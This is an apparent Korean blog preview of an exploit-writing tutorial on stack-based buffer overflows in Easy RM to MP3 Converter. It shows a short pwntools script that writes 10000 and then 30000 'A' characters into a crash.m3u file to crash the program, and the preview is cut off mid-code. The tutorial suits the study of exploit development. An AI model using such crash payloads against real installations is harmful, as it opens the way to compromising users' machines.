목록Windows/WinPwn (9)
cgy12306
Exploit Writing Tutorial part 1 : Stack Based Overflows
Easy RM to MP3 Converter에 존재하는 취약점을 예로 exploit을 할 것이다. 다음과 같이 python 스크립트를 작성한다. from pwn import * payload = 'A'*10000 f = open('./crash.m3u', 'w') f.write(payload) f.close A를 10000개를 crash.m3u라는 파일에 작성하는 코드이다. 실행해보면 crash.m3u 파일이 생성이 되는 것을 볼 수 있다. 이 파일을 Easy RM to MP3 Converter에서 실행시키면 다음과 같이 에러 메시지를 출력한다. A를 30000개 보냈을 때 crash가 발생한다. from pwn import * payload = 'A'*30000 f = open('./crash.m3u'..
Windows/WinPwn
2020. 4. 18. 12:27